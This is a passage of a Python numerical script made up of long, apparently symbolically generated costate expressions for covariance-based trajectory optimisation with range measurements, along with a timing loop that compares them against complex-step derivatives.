xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + 
p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s 
- yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - 
yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - 
xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(-2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - 2*p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p11_s - lamP12_N*(-Dt*sigv**2*theta_s*sin(theta_n*theta_s)**2 + Dt*sigv**2*theta_s*cos(theta_n*theta_s)**2 - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p12_s + lamP13_N*p33_n*p33_s*theta_s*v*cos(theta_n*theta_s)/p13_s - lamP22_N*(2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p23_n*p23_s*theta_s*v*sin(theta_n*theta_s))/p22_s + lamP23_N*p33_n*p33_s*theta_s*v*sin(theta_n*theta_s)/p23_s + lamX_N*theta_s*v*sin(theta_n*theta_s)/x_s - lamY_N*theta_s*v*cos(theta_n*theta_s)/y_s),
(tf)*(-lamP11_N*(-p11_n*p11_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p12_n*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p11_s*p12_n*p12_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p11_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s),
(tf)*(-lamP11_N*(-p11_n*p11_s*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p12_n*p12_s**2*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(-p12_n*p12_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s),
(tf)*(2*lamP11_N*p13_s*v*sin(theta_n*theta_s)/p11_s - lamP12_N*(-p13_s*v*sin(theta_n*theta_s) + p13_s*v*cos(theta_n*theta_s))/p12_s - lamP22_N*p13_s*v*cos(theta_n*theta_s)/p22_s - lamP33_N*(-p13_n*p13_s*(x_n*x_s - xb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s + lamP13_N*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p23_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*(-p12_n*p12_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p13_n*p13_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP12_N*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p12_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*p23_s*v*cos(theta_n*theta_s)/p22_s + lamP13_N*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p13_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP33_N*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p33_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(lamP13_N*p33_s*v*sin(theta_n*theta_s)/p13_s - lamP23_N*p33_s*v*cos(theta_n*theta_s)/p23_s),
tf*0,
])
tock = toc()
print(fx)
print('A:' + str(tock))
tic()
for i in range(1000):
gx = np.array([
(tf)*(-np.imag(-lamP11_N*p11_n**2*p11_s*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n**2*p11_s*x_s*xb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p11_n**2*p11_s*xb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_n**2*p12_s**2*y_n**2*y_s**2/(Dt*p11_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_n**2*p12_s**2*y_n*y_s*yb/(Dt*p11_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_n**2*p12_s**2*yb**2/(Dt*p11_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p11_n*p11_s*p12_n*x_s*xb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + 
x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*xb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*y_n*y_s/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*yb/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n**2*p12_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_n**2*p12_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_n**2*p12_s*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n**2*p12_s*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_n*p22_s*y_n**2*y_s**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p12_n*p22_n*p22_s*y_n*y_s*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 
lamP12_N*p12_n*p22_n*p22_s*yb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p11_n*p11_s*p13_n*x_s*xb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*xb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + 